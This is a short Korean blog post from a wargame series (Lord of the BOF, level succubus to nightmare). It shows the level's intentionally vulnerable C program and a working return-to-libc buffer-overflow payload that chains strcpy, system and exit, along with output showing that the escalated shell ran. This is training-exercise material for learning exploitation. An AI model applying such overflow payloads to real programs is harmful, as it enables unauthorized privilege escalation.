ABOUT ME

-

Today
-
Yesterday
-
Total
-
  • [lob] succubus -> nightmare
    공부/LOB 2015. 2. 19. 05:00


    [succubus@localhost succubus]$ cat nightmare.c
    /*
            The Lord of the BOF : The Fellowship of the BOF
            - nightmare
            - PLT
    */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <dumpcode.h>

    main(int argc, char *argv[])
    {
        char buffer[40];
        char *addr;

        if(argc < 2){
            printf("argv error\n");
            exit(0);
        }

        // check address
        addr = (char *)&strcpy;
            if(memcmp(argv[1]+44, &addr, 4) != 0){
                    printf("You must fall in love with strcpy()\n");
                    exit(0);
            }

            // overflow!
            strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // dangerous waterfall
        memset(buffer+40+8, 'A', 4);
    }


    dummy 44 + strcpy + ret[aaaa] + [buffer + 48] + [source] + [system] + [exit] + [buffer+72] + "my-pass\x0"
    ./aaaaaaaaa `python -c 'print "a"*44 + "\x10\x84\x04\x08" + "bbbb" +"\xa0\xfa\xff\xbf" + "\xac\xfa\xff\xbf"+ "\xe0\x8a\x05\x40"+"\xe0\x91\x03\x40" + "\xb8\xfa\xff\xbf" + "my-pass\x0"'`


    [succubus@localhost succubus]$ ./nightmare `python -c 'print "a"*44 + "\x10\x84\x04\x08" + "bbbb" +"\xb0\xfa\xff\xbf" + "\xbc\xfa\xff\xbf"+ "\xe0\x8a\x05\x40"+"\xe0\x91\x03\x40" + "\xc8\xfa\xff\xbf" + "my-pass\x0"'`
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbb°コÿ¿ɀσ@ɺÿ¿my-pass
    euid = 518
    beg for me

    '공부 > LOB' 카테고리의 다른 글

    [lob] nightmare -> xavius  (0) 2015.08.21
    [lob] succubus -> nightmare  (0) 2015.02.19
    [lob] zombie_assassin -> succubus  (0) 2015.02.17
    [lob] assassin -> zombie_assassin  (0) 2014.07.30
    [lob] giant -> assassin  (0) 2014.07.30
    [lob] bugbear -> giant  (0) 2014.07.30

    댓글 0

Designed by Tistory.